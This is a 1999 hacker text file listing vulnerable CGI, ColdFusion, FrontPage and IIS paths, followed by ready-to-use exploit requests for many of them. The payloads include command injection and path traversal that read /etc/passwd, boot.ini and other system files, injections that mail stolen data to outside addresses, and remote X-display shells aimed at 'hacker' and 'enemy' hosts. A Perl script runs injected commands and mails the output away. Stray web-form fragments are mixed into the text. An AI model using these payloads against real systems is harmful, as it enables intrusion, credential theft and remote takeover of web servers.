°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤°º¤ø,¸¸,ø¤º°°°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,°
° °
° °
° L i s t o f c g i h o l e °
° °
° °
°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤°º¤ø,¸¸,ø¤º°°°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,°
write by putois octobre 99
Index:
bugs cgi
________
/cgi-bin/AT-generate.cgi
/cgi-bin/anyform.cgi
/cgi-bin/aglimpse
/cgi-bin/bnbform.cgi
/cgi-bin/campas
/cgi-bin/carbo
/cgi-bin/cgimail
/cgi-bin/classifieds.cgi
/cgi-bin/count.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/environ.cgi
/cgi-bin/file.pl
/cgi-bin/faxsurvey.cgi
/cgi-bin/formail
/cgi-bin/guestbook
/cgi-bin/handler
/cgi-bin/httpd
/cgi-bin/htmlscript
/cgi-bin/info2www
/cgi-bin/nph-test.cgi
/cgi-bin/nph-publish
/cgi-bin/perl.exe
/cgi-bin/pfdispaly.cgi
/cgi-bin/php
/cgi-bin/phf
/cgi-bin/Quid Pro Quo (mac os)
/cgi-bin/s97_cgi
/cgi-bin/survey.cgi
/cgi-bin/start
/cgi-bin/textcounter
/cgi-bin/uploader.exe
/cgi-bin/view-source
/cgi-bin/webdist
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/websites
/cgi-bin/webstart
/cgi-bin/whois_raw.cgi
/cgi-bin/wwwboard
/cgi-bin/www-msql
cold fusion
___________
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/kdg.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
websql
______
sql
front page
__________
/_vti_bin/shtml.dll
_private/download.log
_vti_pvt/users.pwd front page passwd user
_vti_pvt/administrators.pwd front page passwd administrator
iisadmin
________
/scripts/iisadmin/
AT-generate.cgi
_______________
exploit
anyform.cgi
___________
aglimpse (telnet 80)
________
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5hack\@i.am\
FIELDS MARKED WITH * ARE REQUIRED!
Your Name:*
campas (telnet 80)
______
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
carbo
_____
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
cgimail.exe (nt)
________________
count.cgi
_________
http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../path/file.gif
dumpenv.pl
__________
http://www.site.net/cgi-bin/dumpenv.pl?/session/adminlogin?RCpage=/sysadmin/index.stm
http://www.site.net/c:/program files/sambar41
environ.cgi (telnet 80)
___________
/cgi-bin/environ.cgi HTTP/1.1" 200 2034
file.pl
_______
http://netware.nmrc.org/perl/files.pl?file=sys:system/autoexec.ncf
http://netware.nmrc.org/perl/files.pl?file=sys:etc/ldremote.ncf
http://netware.nmrc.org/perl/files.pl?file=vol2:apps/accounting/payroll.doc
faxsurvey
_________
http://linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
FormMail
________
hack
guestbook
_________
/cgi-bin/wguest.exe?template=3dc:\boot.ini
/cgi-bin/rguest.exe?template=3dc:\winnt\system32\$winnt$.inf
handler (telnet 80)
_______
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0
-> push tab key after cat
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
/cgi-bin/handler/whatever;cat\t/etc/passwd\|\t
GET /cgi-bin/handler/ ;/usr/sbin/xwsh -display enemy:0|?data=Download
GET /cgi-bin/handler/ ;cat /etc/passwd|?data=Download
htmlscript
__________
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
httpd (telnet 80)
_____
GET / HTTP/1.0" 404 -9999999 "
info2www
________
REQUEST_METHOD=GET ./info2www '(../../../../bin/mail user_name
Male
Female
Neuter
start
_____
/cgi-bin/start?curmbox=ACTIVE&js=no&login
textcounter
___________
#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root'; # please _modify_ this
if ($ARGV[0]) {
$CMD=$ARGV[0];
}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}
$text="${URL}/;IFS=\8;${CMD};echo|";
$text =~ s/ /\$\{IFS\}/g;
system({"lynx"} "lynx", $text);
system({"lynx"} "lynx", $text);
uploader.exe
____________
view-source
___________
http://hack.com/cgi-bin/view-source?../../../../../../../etc/passwd'
webdist
_______
http://host.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
http://host/cgi-bin/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh
* run also for : wrap.cgi, handler.cgi, day5datacopier.cgi, day5notifier.cgi
http://victim/cgi-bin/wrap/blah;/tmp/myscript
http://sgi.victim/cgi-bin/wrap?/../../../../../etc
webgais
_______
telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 80 (replace this with the actual length of
the "exploit" line)
query=';mail+you\@your.host
whois_raw
_________
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
www-msql
________
http://www.thegnome.com/secure/.htaccess
http://www.thegnome.com/secure/.wwwacl
http://your.server/cgi-bin/www-sql/protected/something.html
Cold fusion
___________
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt
http://www.server.com/cfdocs/expeval/kdg.cfm?DirPath=C%3A%5Cinetpub%5Cwwwroot%5C
http://www.server.com//cfdocs/expeval/sendmail.cfm?MailFrom=&MailTo=&Subject=&Message=
http://server/cfdocs/snippets/fileexists.cfm?..\..\..\..\boot.ini
http://server/cfdocs/snippets/gettempdirectory.cfm
http://server/cfdocs/snippets/viewexample.cfm?Tagname=..\..\
front page
__________